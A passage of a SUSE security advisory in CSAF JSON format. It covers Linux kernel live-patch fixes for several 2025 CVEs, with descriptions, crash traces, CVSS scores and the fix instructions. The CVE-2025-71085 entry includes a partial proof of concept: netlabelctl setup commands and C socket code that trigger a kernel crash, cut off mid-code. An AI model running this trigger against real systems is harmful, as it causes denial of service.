"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T04:34:10Z",
"details": "important"
}
],
"title": "CVE-2025-21738"
},
{
"cve": "CVE-2025-38159",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38159"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds\n\nSet the size to 6 instead of 2, since \u0027para\u0027 array is passed to\n\u0027rtw_fw_bt_wifi_control(rtwdev, para[0], \u0026para[1])\u0027, which reads\n5 bytes:\n\nvoid rtw_fw_bt_wifi_control(struct rtw_dev *rtwdev, u8 op_code, u8 *data)\n{\n ...\n SET_BT_WIFI_CONTROL_DATA1(h2c_pkt, *data);\n SET_BT_WIFI_CONTROL_DATA2(h2c_pkt, *(data + 1));\n ...\n SET_BT_WIFI_CONTROL_DATA5(h2c_pkt, *(data + 4));\n\nDetected using the static analysis tool - Svace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38159",
"url": "https://www.suse.com/security/cve/CVE-2025-38159"
},
{
"category": "external",
"summary": "SUSE Bug 1245751 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1245751"
},
{
"category": "external",
"summary": "SUSE Bug 1257629 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1257629"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T04:34:10Z",
"details": "important"
}
],
"title": "CVE-2025-38159"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T04:34:10Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T04:34:10Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T04:34:10Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_187-default-3-150400.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_124-default-6-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T04:34:10Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 